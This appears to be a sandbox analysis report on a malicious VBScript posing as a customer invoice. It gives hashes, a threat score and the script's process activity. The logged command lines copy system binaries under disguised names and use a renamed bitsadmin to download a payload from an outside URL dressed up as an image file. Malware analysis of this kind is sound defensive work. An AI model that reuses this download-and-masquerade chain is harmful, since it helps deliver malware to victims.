1b30d432a173c580e9c49c492974bb046d9702bb53a80eccd5c4137ecf9ef839 | Triage

Analysis

max time kernel
63s
max time network
33s
platform
windows7_x64
resource
win7
submitted
13-07-2020 07:40

Sharing

Report Analysis Logs

General

Target

Fatt_cliente_07008120482.vbs
Size

4KB
MD5

740e42ba34a3eb4f22a7f2ce3a738a5c
SHA1

ad8a96ca8d57f0d18ff06366d507d547deb051b0
SHA256

1b30d432a173c580e9c49c492974bb046d9702bb53a80eccd5c4137ecf9ef839
SHA512

f15559533b8dadf6571e141347db4c90c4679fd57346760a4912d94d6dcc33b4049bc93565ae9acb75324b039c065f78a294dfff9594a73a6d7fcdbfee3bba54

Score

8^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1124 wrote to memory of 608	1124	WScript.exe	cmd.exe
PID 1124 wrote to memory of 608	1124	WScript.exe	cmd.exe
PID 1124 wrote to memory of 608	1124	WScript.exe	cmd.exe
PID 1124 wrote to memory of 1480	1124	WScript.exe	cmd.exe
PID 1124 wrote to memory of 1480	1124	WScript.exe	cmd.exe
PID 1124 wrote to memory of 1480	1124	WScript.exe	cmd.exe
PID 1124 wrote to memory of 912	1124	WScript.exe	wubvVZY.exe
PID 1124 wrote to memory of 912	1124	WScript.exe	wubvVZY.exe
PID 1124 wrote to memory of 912	1124	WScript.exe	wubvVZY.exe
PID 1124 wrote to memory of 912	1124	WScript.exe	wubvVZY.exe

Executes dropped EXE 1 IoCs

Processes:

wubvVZY.exe

pid process

912 wubvVZY.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_07008120482.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zwubvVZY.exe
2⤵
PID:608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\wubvVZY.exe
2⤵
PID:1480

C:\Users\Admin\AppData\Roaming\wubvVZY.exe
"C:\Users\Admin\AppData\Roaming\wubvVZY.exe" /transfer VWCWnV /download https://sheyenneweber.com/webol/07008120482/logo.jpg C:\Users\Admin\AppData\Roaming\logo.jpg
2⤵
- Executes dropped EXE
PID:912

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\wubvVZY.exe

Download Submit
C:\Users\Admin\AppData\Roaming\wubvVZY.exe

Download Submit
memory/608-0-0x0000000000000000-mapping.dmp

Download
memory/912-3-0x0000000000000000-mapping.dmp

Download
memory/1480-1-0x0000000000000000-mapping.dmp

Download